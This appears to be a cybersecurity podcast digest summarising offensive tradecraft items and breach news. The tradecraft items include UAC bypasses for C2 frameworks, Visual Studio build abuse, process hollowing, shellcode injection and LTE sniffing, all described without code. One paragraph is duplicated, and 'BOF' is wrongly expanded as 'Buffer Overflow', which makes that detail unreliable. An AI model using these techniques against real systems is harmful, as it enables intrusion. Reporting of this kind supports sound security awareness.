# Latest Podcast
# Description
The Windows Incident Response blog entry reviews the r77 rootkit, focusing on the vital role of understanding registry keys and values for threat hunting. SwaggerHole, a Python3 script, automates the search for secrets in SwaggerHub APIs using multithreading and JSON output. UAC-BOF-Bonanza is a GitHub repository hosting various UAC bypass methods as BOF exploits for the Havoc C2 framework and Sliver. An article demonstrates exploiting the Visual Studio build process to execute malicious commands, achieving system access and privilege elevation on Windows. Another article outlines implementing process hollowing in Windows, refining traditional code injection methods. A guide explains reverse engineering a FOSCAM camera's firmware with SPI flash programmer and Ghidra to extract keys. Techniques to analyze and deobfuscate VM Protected and Alcatraz obfuscated binaries are shared. Brett Buerhaus revealed an XSS exploit chain involving DOM clobbering. SpawnWith is a BOF for process spawning and shellcode injection. Minder by Stacklok enhances software supply chain security with various features. HLR lookup services by ООО «СМС-центр» provide information about mobile phone numbers with third-party operator data. FileSearch.link is a service for finding files across upload sites. Various file-sharing and cloud storage websites are mentioned for data exchange research. A PDF with Geolocation Analysis Diagram from the 'osint' repository assists in intelligence work. A GitHub repository reveals an open-source LTE sniffer tool for LTE communication eavesdropping, necessitating legal compliance. Geo-Recon is an OSINT tool for IP geolocation and reputation checks with optional NMAP support. IP-Tracer is a command-line tool for tracking IP addresses on Linux and Termux, leveraging ip-api for information retrieval.
A Russian national is on trial for a cyberattack on a power grid that led to a blackout in 38 villages. North Korean hackers infiltrated the Russian Ministry of Foreign Affairs using KONNI malware. Sony's Insomniac Games alerts employees to a data breach by Rhysida ransomware group. The FTC sues H&R Block for deceptive free online filing ads. LAX airport's database was compromised by IntelBroker, exposing 2.5 million records. The LockBit ransomware group has extorted over a billion dollars, with authorities disrupting their operations. Microsoft releases PyRIT for AI systems security testing. Australian telecom Tangerine discloses a breach affecting 230,000 users. New Jersey rehab centers by Maryville fell victim to a cyberattack, and Mr. Cooper exposes two million customer records. Google Pay is set to end peer-to-peer payments in the US, while U-Haul confirms a breach affecting 67,000 customers. Apple fixes a vulnerability in its Shortcuts app. Avast settles for $16.5 million with the FTC for data privacy violations. The U.S. military assesses a high-altitude balloon over Utah. Google hits pause on Gemini AI's person generation over errors. The blockchain space is riddled with security breaches and unethical practices, and GitHub hosts OSINT-Practitioners, a resource hub for open-source intelligence enthusiasts.
A Russian national is on trial for a cyberattack on a power grid that led to a blackout in 38 villages. North Korean hackers infiltrated the Russian Ministry of Foreign Affairs using KONNI malware. Sony's Insomniac Games alerts employees to a data breach by Rhysida ransomware group. The FTC sues H&R Block for deceptive free online filing ads. LAX airport's database was compromised by IntelBroker, exposing 2.5 million records. The LockBit ransomware group has extorted over a billion dollars, with authorities disrupting their operations. Microsoft releases PyRIT for AI systems security testing. Australian telecom Tangerine discloses a breach affecting 230,000 users. New Jersey rehab centers by Maryville fell victim to a cyberattack, and Mr. Cooper exposes two million customer records. Google Pay is set to end peer-to-peer payments in the US, while U-Haul confirms a breach affecting 67,000 customers. Apple fixes a vulnerability in its Shortcuts app. Avast settles for $16.5 million with the FTC for data privacy violations. The U.S. military assesses a high-altitude balloon over Utah. Google hits pause on Gemini AI's person generation over errors. The blockchain space is riddled with security breaches and unethical practices, and GitHub hosts OSINT-Practitioners, a resource hub for open-source intelligence enthusiasts.
# Tradecraft
[#]
The recent Windows Incident Response blog entry examines the r77 rootkit, emphasizing the importance of understanding the distinction between registry keys and values for effective threat hunting and analysis of indirect artifacts.
[#]
The swaggerHole Python3 script facilitates the automated discovery of hidden secrets within public APIs listed on SwaggerHub by utilizing multithreading and optional JSON output.
[#]
A GitHub repository named UAC-BOF-Bonanza compiles various UAC bypass methods turned into Buffer Overflow (BOF) exploits, designed for integration with the Havoc C2 framework and Sliver, potentially useful for penetration testers seeking to overcome User Account Control (UAC) on Windows systems.
[#]
The article demonstrates an exploitation method where a Visual Studio build process is abused to execute a pre-build command through a malicious Gitea-hosted project, leading to system access on a Windows server via a PHP webshell and privilege escalation using FullPowers and GodPotato tools.
[#]
The article provides a detailed guide on implementing process hollowing in Windows, a technique used for code injection, with additional steps on handling the import table and resolving dependencies remotely without unmapping the primary image of the process, aiming to improve upon traditional methods.
[#]
A detailed walkthrough on reverse engineering a FOSCAM camera's firmware to extract encryption keys, utilizing an SPI flash programmer, and analyzing the code with Ghidra, culminating in discovering and applying the deciphered key to decrypt the firmware binary.
[#]
The article details techniques for analyzing and deobfuscating binaries protected by VM Protect and Alcatraz obfuscators, including manual reverse engineering methods and adding corrected opcodes to a new section for analysis.
[#]
Security researcher Brett Buerhaus detailed a Cross-Site Scripting exploit chain involving DOM clobbering without Content Security Policy restrictions, showcasing the technique's potential for compromising secure domains.
[#]
SpawnWith is an experimental Beacon Object File (BOF) enabling process spawning and shellcode injection into a target process using duplicated tokens, expanding the capabilities beyond the standard spawnas and inject commands.
[#]
Minder by Stacklok is a software supply chain security platform offering policy management, security checks, artifact attestation, and dependency management to ensure development teams create secure software.
[#]
The text discusses HLR (Home Location Register) lookup services which allow individuals to query mobile phone numbers to discover the associated carrier, subscriber status, and other details, offered by ООО «СМС-центр» for testing and verification purposes, noting that the accuracy is not guaranteed as the data is provided by third-party mobile operators.
[#]
FileSearch.link is a search service leveraging Google's infrastructure that allows users to find content across various file upload sites, offering sorting by relevance or date and the option to purchase premium accounts for faster downloads.
[#]
The text lists various file-sharing and cloud storage websites where users can search for and potentially exchange data, which can be pertinent to those researching digital forensics or undertaking penetration testing to identify vulnerabilities in data transmission and storage.
[#]
The PDF file from the 'osint' repository contains a version 1.2 update of a Geolocation Analysis Diagram that provides visual clues for conducting geolocation analysis in open source intelligence work.
[#]
The SysSec-KAIST/LTESniffer repository on GitHub details an open-source tool for eavesdropping on LTE uplink and downlink communications, requiring proper hardware and adherence to local regulations.
[#]
Geo-Recon is an OSINT command-line tool for quickly obtaining the geolocation and reputation of an IP by providing features like IP geolocation check, IP reputation check, and optional NMAP support for enhanced scanning.
[#]
IP-Tracer is a tool for tracking IP addresses, usable on Linux and Termux, which relies on ip-api for locating the information and can be installed via a series of command-line instructions.
# News
[#]
A Russian national faces trial for executing a cyberattack on a power grid in the Vologda region, leading to a blackout across 38 villages, and if convicted, could serve up to eight years in prison.
[#]
North Korean hackers have used KONNI malware to backdoor software at the Russian Ministry of Foreign Affairs, which allows the execution of commands and stealing of data via an encrypted connection.
[#]
Sony's game development studio, Insomniac Games, is notifying employees of a data breach by the Rhysida ransomware group, providing additional credit monitoring services, and actively responding to inquiries regarding the November attack.
[#]
The FTC is suing H&R Block for deceptively advertising free online filing services which often lead to users being charged for more expensive tax products they may not need.
[#]
The Los Angeles International Airport database was compromised by hacker IntelBroker, exposing 2.5 million records of private plane owners including full names, CPA numbers, 1.9 million email addresses, company names, plane model numbers, and tail numbers, due to a CRM system vulnerability.
[#]
LockBit ransomware group has extorted over a billion dollars from victims in its four-year operation, with recent authority-led financial investigations revealing the true scale of their illicit earnings and resulting in significant disruption of their activities and seizure of their assets.
[#]
Microsoft has released PyRIT, an automation framework for red teaming generative AI systems, enabling security professionals to proactively identify risks by simulating realistic adversarial behaviors against AI implementations.
[#]
Australian telecommunications provider Tangerine disclosed a data breach affecting approximately 230,000 individuals, revealing personal details excluding financial information, and has taken steps such as multi-factor authentication to enhance account security.
[#]
Several rehabilitation centers in New Jersey, operated by Maryville, were compromised in a cyberattack, with attackers accessing sensitive data through a corporate email account, and in response, Maryville is enhancing its security measures and offering affected individuals credit monitoring services.
[#]
Over two million customer records from Mr. Cooper mortgage firm were exposed due to an insecurely configured Google Cloud storage bucket, revealing names, phone numbers, and emails, necessitating stricter security controls and incident response protocols.
[#]
Google Pay will discontinue its peer-to-peer payment services in the US on June 4, 2024, urging users to migrate to Google Wallet and assuring continued support for other features until the shutdown date.
[#]
U-Haul confirmed a data breach affecting about 67,000 customers from the USA and Canada, due to an unauthorized intrusion by attackers using stolen credentials on December 5; no payment information was taken, and improved security measures like password changes and Experian IdentityWorks Credit 3B memberships have been implemented.
[#]
A critical vulnerability in Apple's Shortcuts app, tracked as CVE-2024-23204, which could let attackers access sensitive data without user consent, has been fixed in the latest iOS, iPadOS, and macOS updates.
[#]
Avast, known for its antivirus and privacy tools, collected and sold users' browsing data through its subsidiary Jumpshot from 2014 to 2020, leading to a $16.5 million FTC settlement and the requirement for Avast to establish a comprehensive privacy program and obtain explicit user consent for data collection.
[#]
U.S. military has tracked and assessed a high-altitude balloon over Utah, confirmed non-threatening and non-maneuverable by NORAD; balloon, seemingly made of Mylar with an attached box, is traveling east and expected over Georgia, with origins and purpose currently unclear.
[#]
Google has temporarily halted its Gemini AI's person generation feature after it incorrectly produced diverse historical figures, and the company is working on improving the system to address these issues.
[#]
A series of security breaches and unethical practices have affected the blockchain space recently, including wallet compromises in Axie Infinity and Beam, token pump-and-dump schemes from influencers and an NFT project, laundering of stolen funds from the AAX exchange and FixedFloat platform, insider trading allegations in the NFT market, and governance issues on the Farcaster social network platform.
[#]
GitHub houses a repository named OSINT-Practitioners, offering a collection of links to various tools, techniques, and resources provided by notable personalities in the open-source intelligence community, covering specialties such as geolocation, social media investigation, and the development of OSINT tools, accessible for both free and paid services.
